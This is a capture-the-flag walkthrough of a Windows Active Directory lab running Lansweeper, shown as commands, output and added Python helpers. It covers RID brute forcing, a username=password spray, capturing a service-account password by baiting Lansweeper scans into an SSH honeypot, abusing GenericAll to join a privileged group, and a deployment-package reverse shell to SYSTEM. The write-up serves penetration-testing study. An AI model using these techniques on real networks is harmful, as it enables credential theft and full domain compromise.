
Sweep

Box details
OS Windows
Difficulty Medium
Status Retired
Release September 2025
Completed October 2025

Enumeration

Nmap port scan of the target host:

$ nmap -sV -sC -p- -PN -oA sweep_nmap 10.129.234.177
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-30 23:12 CEST
Nmap scan report for 10.129.234.177
Host is up (0.077s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
81/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp    open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after:  2121-12-21T09:22:27
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-30 21:16:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-30T21:18:38+00:00
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2025-07-27T23:26:33
|_Not valid after:  2026-01-26T23:26:33
|_ssl-date: 2025-09-30T21:19:09+00:00; +9s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
9524/tcp  open  ssl/unknown
|_ssl-date: 2025-09-30T21:19:09+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=lansweeper-server-communication
| Subject Alternative Name: DNS:localhost, DNS:INVENTORY, DNS:inventory.sweep.vl, IP Address:192.168.115.145
| Not valid before: 2024-02-08T19:51:08
|_Not valid after:  3024-02-08T19:51:08
| tls-alpn:
|   h2
|_  http/1.1
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:27 GMT
|     Server: Kestrel
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-Length: 1
|     Connection: close
|     Content-Type: text/html
|     Date: Tue, 30 Sep 2025 21:16:55 GMT
|     Server: Kestrel
|     api-supported-versions: 1.0
|   HTTPOptions:
|     HTTP/1.1 405 Method Not Allowed
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:16:56 GMT
|     Server: Kestrel
|     Allow: GET
|   Help, SSLSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:13 GMT
|     Server: Kestrel
|   Kerberos:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:16 GMT
|     Server: Kestrel
|   LDAPSearchReq, LPDString:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:28 GMT
|     Server: Kestrel
|   RTSPRequest:
|     HTTP/1.1 505 HTTP Version Not Supported
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:16:56 GMT
|     Server: Kestrel
|   TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Tue, 30 Sep 2025 21:17:15 GMT
|_    Server: Kestrel
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
50238/tcp open  msrpc         Microsoft Windows RPC
50250/tcp open  msrpc         Microsoft Windows RPC
60441/tcp open  msrpc         Microsoft Windows RPC
63497/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
63498/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s
| smb2-time:
|   date: 2025-09-30T21:18:30
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Port 53/UDP is also open.

There are a few ports of interest:

  • 81: The login page of a Lansweeper web console, served over HTTP.
  • 82: The same login page, served over HTTPS.
  • 9524: Lansweeper's server communication endpoint (a Kestrel HTTP service behind TLS, certificate name lansweeper-server-communication), used by the Lansweeper scanning agents.

The Nmap scan also found the DNS domain name, sweep.vl, and the computer name, inventory.sweep.vl.

The login page on ports 81 and 82 offers a choice between logging in with Windows (domain) credentials or as the built-in Lansweeper administrator account.


Nothing on the page or in the page source gives any hints on which version of Lansweeper is in use.

The SMB server allows guest logons (the Guest account with an empty password). The following shares are visible:

$ nxc smb 10.129.234.177 -u guest -p '' --shares
SMB         10.129.234.177  445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.129.234.177  445    INVENTORY        [+] sweep.vl\guest:
SMB         10.129.234.177  445    INVENTORY        [*] Enumerated shares
SMB         10.129.234.177  445    INVENTORY        Share           Permissions     Remark
SMB         10.129.234.177  445    INVENTORY        -----           -----------     ------
SMB         10.129.234.177  445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.129.234.177  445    INVENTORY        C$                              Default share
SMB         10.129.234.177  445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.129.234.177  445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.129.234.177  445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.129.234.177  445    INVENTORY        NETLOGON                        Logon server share
SMB         10.129.234.177  445    INVENTORY        SYSVOL                          Logon server share

The shares DefaultPackageShare$ and Lansweeper$ stand out. Of the two, only the DefaultPackageShare$ share is readable, with the following contents:

$ smbclient -N  //sweep.vl/DefaultPackageShare$
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb  8 20:46:04 2024
  ..                                  D        0  Thu Feb  8 20:47:44 2024
  Images                              D        0  Thu Feb  8 20:46:08 2024
  Installers                          D        0  Thu Feb  8 20:46:04 2024
  Scripts                             D        0  Thu Feb  8 20:46:08 2024

                5048575 blocks of size 4096. 992684 blocks available
smb: \> ls Scripts/
  .                                   D        0  Thu Feb  8 20:46:08 2024
  ..                                  D        0  Thu Feb  8 20:46:04 2024
  CmpDesc.vbs                         A     1119  Tue Jan 30 02:47:08 2024
  CopyFile.vbs                        A      728  Tue Jan 30 02:47:08 2024
  Wallpaper.vbs                       A     1245  Tue Jan 30 02:47:08 2024

                5048575 blocks of size 4096. 992684 blocks available

Except for a JPG file in Images and the above Visual Basic scripts, there is nothing else on the share.

Guest access to SMB also allows enumerating domain principals by RID brute forcing. A Security Identifier (SID) consists of a domain-specific prefix followed by a Relative Identifier (RID). The prefix is the same for every principal in the domain, and RIDs are allocated from a small, mostly sequential range (well-known principals below 1000, created accounts from 1000 upwards), so the space of candidate SIDs is tiny. Asking the server to resolve each candidate SID back to a name (LSA LookupSids over SMB, which the guest account is allowed to call) therefore lists the accounts without any right to query the directory itself.

RID brute forcing can be performed with NetExec:

$ nxc smb 10.129.54.96 -u Guest -p '' --rid-brute
SMB         10.129.54.96    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.129.54.96    445    INVENTORY        [+] sweep.vl\Guest:
SMB         10.129.54.96    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.129.54.96    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.129.54.96    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.129.54.96    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

The domain naming convention appears to be four letters followed by three digits. One username, intern, doesn't follow it and immediately stands out. If any account has a weak password, it's likely to be this one; as a wild guess, the password may even be the same as the username.

Attempting to log in to the Lansweeper UI with the credentials intern:intern works.


Tip

Another way of testing credentials where the password matches the username is with NetExec:

$ nxc smb 10.129.54.96 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.129.54.96    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.129.54.96    445    INVENTORY        [-] sweep.vl\jgre808:jgre808 STATUS_LOGON_FAILURE
...
SMB         10.129.54.96    445    INVENTORY        [-] sweep.vl\svc_inventory_win:svc_inventory_win STATUS_LOGON_FAILURE
SMB         10.129.54.96    445    INVENTORY        [-] sweep.vl\svc_inventory_lnx:svc_inventory_lnx STATUS_LOGON_FAILURE
SMB         10.129.54.96    445    INVENTORY        [+] sweep.vl\intern:intern
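The two steps above, turning the RID brute-force output into a list of real user accounts and spotting the one name that breaks the naming convention, can be scripted so the list feeds straight into the username=password spray. The following is an added example, not part of the original write-up: it parses NetExec's --rid-brute output (the sample embedded below is constructed from the output shown earlier), drops the well-known and machine accounts, infers the dominant username shape and reports the outliers, and writes the remaining names to users.txt. The line format the regular expression expects is an assumption based on that output.

```python
"""Build a spray wordlist from NetExec --rid-brute output and flag naming-convention outliers.

Added example, not part of the original write-up. SAMPLE_OUTPUT is constructed from
the RID brute-force output shown above; the line format the regex expects is an
assumption based on that output.
"""
import re
from collections import Counter

# Constructed from the nxc --rid-brute output above (prefix columns shortened).
SAMPLE_OUTPUT = """\
SMB  10.129.54.96  445  INVENTORY  500: SWEEP\\Administrator (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  501: SWEEP\\Guest (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  502: SWEEP\\krbtgt (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  512: SWEEP\\Domain Admins (SidTypeGroup)
SMB  10.129.54.96  445  INVENTORY  1000: SWEEP\\INVENTORY$ (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  1103: SWEEP\\Lansweeper Admins (SidTypeGroup)
SMB  10.129.54.96  445  INVENTORY  1113: SWEEP\\jgre808 (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  1114: SWEEP\\bcla614 (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  1115: SWEEP\\hmar648 (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  1116: SWEEP\\jgar931 (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  1123: SWEEP\\svc_inventory_win (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  1124: SWEEP\\svc_inventory_lnx (SidTypeUser)
SMB  10.129.54.96  445  INVENTORY  1125: SWEEP\\intern (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType>)" at the end of each nxc line.
RID_LINE = re.compile(r"(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<type>Sid\w+)\)\s*$")
WELL_KNOWN_USER_RIDS = {500, 501, 502}   # Administrator, Guest, krbtgt: not worth a username=password guess


def parse_rid_brute(text):
    """Yield (rid, name, sid_type) for every principal nxc resolved."""
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            yield int(m["rid"]), m["name"], m["type"]


def candidate_users(text):
    """User accounts worth spraying: SidTypeUser, not well-known, not a machine account ($)."""
    return [name for rid, name, sid_type in parse_rid_brute(text)
            if sid_type == "SidTypeUser" and rid not in WELL_KNOWN_USER_RIDS and not name.endswith("$")]


def shape(name):
    """Reduce a username to its 'shape': letters -> a, digits -> 9, other characters kept."""
    return re.sub(r"[a-z]", "a", re.sub(r"\d", "9", name.lower()))


def naming_outliers(users):
    """Accounts whose shape differs from the most common one (e.g. 'intern' among jgre808-style names)."""
    dominant = Counter(shape(u) for u in users).most_common(1)[0][0]
    return [u for u in users if shape(u) != dominant]


def write_wordlist(users, path):
    """One username per line, usable as both -u and -p for a username=password spray."""
    with open(path, "w") as fh:
        fh.write("\n".join(users) + "\n")


if __name__ == "__main__":
    users = candidate_users(SAMPLE_OUTPUT)
    write_wordlist(users, "users.txt")
    print("spray candidates:", users)
    print("naming outliers :", naming_outliers(users))
```

Run it on the saved nxc output and pass the resulting users.txt to the spray shown in the tip above. The outlier list is a prioritisation hint only: service accounts also fall outside the convention, and on this box the one with the weak password was the human account.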

After logging in, the version turns out to be Lansweeper 11.1.6.0. There are no publicly known vulnerabilities for this version.

With valid domain credentials, the rest of the domain can be enumerated as well. The obvious choice for this is BloodHound.

Data is collected with the bloodhound-python ingestor:

$ bloodhound-python -u intern -p 'intern' -ns 10.129.54.96 -d sweep.vl -c all
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 07S

Enumerating the intern user in BloodHound didn't turn up anything of value.

Foothold

There is a lot of built-in functionality in Lansweeper that could be abused for privilege escalation, but none of the Basic actions listed on the asset page for inventory.sweep.vl are available to intern.


Another Lansweeper feature is target scanning. Among its many options is Scanning credentials, which maps stored credentials to the targets Lansweeper scans. The key point is that the credentials aren't restricted to targets already managed by Lansweeper: they are sent to any target Lansweeper has network access to, including the attack host. If the password can be captured, it might provide access to a more privileged service account than the current intern user.

A scan is created from the Scanning targets page in the Scanning menu, with the attack host as its target.


Note

The SSH port of the scanning target is deliberately set to a non-standard port (9001 here), the one the honeypot below listens on, so that it cannot clash with a real SSH daemon on the attack host.

Stored credentials are mapped to the scan under Scanning credentials. The list includes two service accounts, one for Linux and one for Windows.


The Linux credentials are used for SSH password authentication, so capturing them requires an SSH server that accepts any password and logs it, such as the sshesame honeypot.

With the honeypot up, it takes a few minutes after the scan is triggered until Lansweeper attempts to connect:

$ ./sshesame -config sshesame.yaml
INFO 2025/10/02 20:02:42 No host keys configured, using keys at "/home/admin/.local/share/sshesame"
INFO 2025/10/02 20:02:42 Listening on [::]:9001
2025/10/02 20:05:51 [10.129.54.96:58968] authentication for user "svc_inventory_lnx" without credentials rejected
2025/10/02 20:05:51 [10.129.54.96:58968] authentication for user "svc_inventory_lnx" with password "0|5m-U6?/uAX" accepted
2025/10/02 20:05:51 [10.129.54.96:58968] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] session requested
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] PTY using terminal "xterm" (size 80x25) requested
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] shell requested
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] input: "smclp"
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] input: "show system1"
WARNING 2025/10/02 20:06:01 Error sending CRLF: EOF
2025/10/02 20:06:01 [10.129.54.96:58968] [channel 0] closed
2025/10/02 20:06:01 [10.129.54.96:58968] connection closed
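When the honeypot runs for longer, or several scanners hit it, the raw log is easier to triage as structured records than as lines. The following is an added example, not part of the original write-up or of sshesame: it parses output of the shape shown above into per-connection sessions holding the accepted credentials, the client banner and the commands the scanner tried after logging in. The log lines embedded in it are constructed from the output above, and the line format (timestamp, [ip:port], message) is an assumption based on that output.

```python
"""Parse sshesame honeypot output into per-connection records of captured credentials.

Added example, not part of the original write-up or of sshesame. SAMPLE_LOG is
constructed from the honeypot output above; the line format (timestamp, [ip:port],
message) is an assumption based on that output.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE_LOG = """\
INFO 2025/10/02 20:02:42 Listening on [::]:9001
2025/10/02 20:05:51 [10.129.54.96:58968] authentication for user "svc_inventory_lnx" without credentials rejected
2025/10/02 20:05:51 [10.129.54.96:58968] authentication for user "svc_inventory_lnx" with password "0|5m-U6?/uAX" accepted
2025/10/02 20:05:51 [10.129.54.96:58968] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] shell requested
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] input: "smclp"
2025/10/02 20:05:51 [10.129.54.96:58968] [channel 0] input: "show system1"
WARNING 2025/10/02 20:06:01 Error sending CRLF: EOF
2025/10/02 20:06:01 [10.129.54.96:58968] connection closed
"""

# Per-connection event lines; INFO/WARNING daemon lines carry no [ip:port] and are skipped.
EVENT = re.compile(r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<peer>[^\]]+)\] (?P<msg>.*)$")
# Quoted fields are matched up to the next double quote; a password containing one would be cut short.
PASSWORD_AUTH = re.compile(r'authentication for user "(?P<user>[^"]*)" with password "(?P<password>[^"]*)" (?P<result>accepted|rejected)')
CLIENT_VERSION = re.compile(r'connection with client version "(?P<version>[^"]*)" established')
CHANNEL_INPUT = re.compile(r'\[channel \d+\] input: "(?P<cmd>[^"]*)"')


@dataclass
class Session:
    peer: str                     # "ip:port" of the connecting scanner
    first_seen: str
    credentials: List[Tuple[str, str, str]] = field(default_factory=list)  # (user, password, result)
    client_version: Optional[str] = None
    commands: List[str] = field(default_factory=list)


def parse_sshesame_log(text: str) -> List[Session]:
    """Group events by peer address and pull out passwords, the client banner and typed commands."""
    sessions = {}
    for line in text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        s = sessions.setdefault(m["peer"], Session(peer=m["peer"], first_seen=m["ts"]))
        msg = m["msg"]
        if (a := PASSWORD_AUTH.search(msg)):
            s.credentials.append((a["user"], a["password"], a["result"]))
        elif (v := CLIENT_VERSION.search(msg)):
            s.client_version = v["version"]
        elif (c := CHANNEL_INPUT.search(msg)):
            s.commands.append(c["cmd"])
    return list(sessions.values())


def accepted_credentials(sessions: List[Session]) -> List[Tuple[str, str, str]]:
    """(source_ip, user, password) for every password the honeypot accepted, i.e. a secret the client really sent."""
    return [(s.peer.rsplit(":", 1)[0], user, password)
            for s in sessions for user, password, result in s.credentials if result == "accepted"]


if __name__ == "__main__":
    sessions = parse_sshesame_log(SAMPLE_LOG)
    for s in sessions:
        print(s.peer, s.client_version, s.commands)
    print(accepted_credentials(sessions))
```

The client banner (RebexSSH here) and the post-login commands are worth keeping alongside the password: they identify which product sent the credential, which matters when the honeypot is also reached by things other than the scanner you baited.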

Back in BloodHound, running the Group Delegated Object Control query for svc_inventory_lnx reveals that this user has GenericAll over the Lansweeper Admins group.


GenericAll includes the right to add members to the group. That matters because members of Lansweeper Admins have CanPSRemote (WinRM) access to inventory.sweep.vl.


Note

There is no predefined query in BloodHound for enumerating users with WinRM access, but it can be found with raw Cypher queries instead. CanPSRemote is a single edge from a user or group to a computer, so the group membership has to be walked explicitly to catch users who only inherit the right through a group (as intern does here).

Find users with WinRM rights, directly or through group membership:

MATCH p=(u:User)-[:MemberOf*0..]->(g)-[:CanPSRemote]->(c:Computer) RETURN p

Find groups with WinRM rights:

MATCH p=(g:Group)-[:CanPSRemote]->(c:Computer) RETURN p
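The same chain the BloodHound UI shows (a principal controls a group, and that group has remote management on a host) can also be found offline from the collector's JSON files, which is handy for checking one specific path without Neo4j. The following is an added example, not part of the original write-up or of BloodHound: it reads bloodhound-python style users, groups and computers data, collects the principals holding a membership-changing right over each group, intersects that with the groups granted PowerShell remoting on each computer, and returns controller, group, computer triples. The embedded data is constructed to mirror this box; the collector's field names ("Aces", "PSRemoteUsers") and the domain SID are assumptions to be checked against real collector output.

```python
"""Find "controls a group that has WinRM on a host" paths in bloodhound-python output, without Neo4j.

Added example, not part of the original write-up or of BloodHound. The JSON below is
constructed to mirror the SharpHound-v4-style files bloodhound-python writes
(users/groups/computers with "Aces" and "PSRemoteUsers"); the exact field names are an
assumption and should be checked against your own collector output. The domain SID is made up.
"""
import json

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed, not the real domain SID


def sid(rid):
    return f"{DOMAIN_SID}-{rid}"


# Constructed collector output, trimmed to the objects on the path found above.
USERS = {"data": [
    {"ObjectIdentifier": sid(1124), "Properties": {"name": "SVC_INVENTORY_LNX@SWEEP.VL"}, "Aces": []},
    {"ObjectIdentifier": sid(1125), "Properties": {"name": "INTERN@SWEEP.VL"}, "Aces": []},
]}
GROUPS = {"data": [
    {"ObjectIdentifier": sid(1103), "Properties": {"name": "LANSWEEPER ADMINS@SWEEP.VL"},
     "Aces": [{"PrincipalSID": sid(1124), "PrincipalType": "User", "RightName": "GenericAll", "IsInherited": False}]},
    {"ObjectIdentifier": sid(3101), "Properties": {"name": "LANSWEEPER DISCOVERY@SWEEP.VL"}, "Aces": []},
]}
COMPUTERS = {"data": [
    {"ObjectIdentifier": sid(1000), "Properties": {"name": "INVENTORY.SWEEP.VL"},
     "PSRemoteUsers": {"Collected": True, "FailureReason": None,
                       "Results": [{"ObjectIdentifier": sid(1103), "ObjectType": "Group"}]}},
]}

# BloodHound edge names that let the holder change a group's membership, directly or after
# first taking ownership / rewriting the DACL.
GROUP_CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns", "AddMember"}


def load(path):
    """Read one collector file, e.g. load('20251002_groups.json')."""
    with open(path) as fh:
        return json.load(fh)


def names_by_sid(*collections):
    return {o["ObjectIdentifier"]: o["Properties"]["name"] for c in collections for o in c["data"]}


def group_controllers(groups):
    """group SID -> principal SIDs holding a membership-changing right over it."""
    out = {}
    for g in groups["data"]:
        for ace in g.get("Aces", []):
            if ace["RightName"] in GROUP_CONTROL_RIGHTS:
                out.setdefault(g["ObjectIdentifier"], set()).add(ace["PrincipalSID"])
    return out


def winrm_groups(computers):
    """computer SID -> group SIDs in its PSRemoteUsers (what BloodHound draws as CanPSRemote)."""
    out = {}
    for c in computers["data"]:
        ps = c.get("PSRemoteUsers") or {}
        if not ps.get("Collected"):
            continue   # remote-management group membership was not enumerated on this host
        out[c["ObjectIdentifier"]] = {r["ObjectIdentifier"] for r in ps.get("Results", []) if r["ObjectType"] == "Group"}
    return out


def group_to_winrm_paths(users, groups, computers):
    """(controller, group, computer) name triples: controller -[GenericAll-like]-> group -[CanPSRemote]-> computer."""
    names = names_by_sid(users, groups, computers)
    controllers = group_controllers(groups)
    paths = []
    for computer, group_sids in winrm_groups(computers).items():
        for group in group_sids:
            for principal in controllers.get(group, ()):
                paths.append((names.get(principal, principal), names.get(group, group), names.get(computer, computer)))
    return paths


if __name__ == "__main__":
    for path in group_to_winrm_paths(USERS, GROUPS, COMPUTERS):
        print(" -> ".join(path))
```

Replace the embedded dictionaries with load() calls on the collector's files to run it against real data. Nested group membership (a controlled group that is itself a member of the remoting group) is not followed here; for that, walk the groups' "Members" lists before the intersection.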

There are a few ways of adding a user to a group remotely (SAMR over SMB, or an LDAP modify of the member attribute). From a Linux attack host, the simplest is net rpc, which also makes it easy to verify the result:

$ net rpc group addmem 'Lansweeper Admins' 'intern' -U 'sweep.vl/svc_inventory_lnx%0|5m-U6?/uAX' -S 10.129.54.96
$ net rpc group members 'Lansweeper Admins' -U 'sweep.vl/svc_inventory_lnx%0|5m-U6?/uAX' -S 10.129.54.96
SWEEP\jgre808
SWEEP\intern

As a member of Lansweeper Admins, intern can now log in over WinRM with Evil-WinRM. The added membership is a change to the domain and should be reverted afterwards with net rpc group delmem.

Got the user flag.

Privilege Escalation (Administrator)

In addition to WinRM access, members of Lansweeper Admins have further rights in the Lansweeper UI, in particular permission to deploy packages, which is Lansweeper's term for running custom commands and scripts on targets. Abusing this is straightforward: a deployment package containing a reverse shell makes the target connect back to the attack host once the deployment is triggered.

A custom deployment package is created under Deployment > New package, where the package details and the command to run are filled in.


In order to deploy the package, it needs to be associated with credentials for the target it's supposed to run on. The obvious choice in this case are the credentials for svc_inventory_win.

Mapping the credentials to the deployment and triggering it returns a reverse shell to a Netcat listener on the attack host, running as NT AUTHORITY\SYSTEM:

$ nc -lnvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.129.54.96 59477

PS C:\Windows\system32> whoami
nt authority\system

Got the root flag.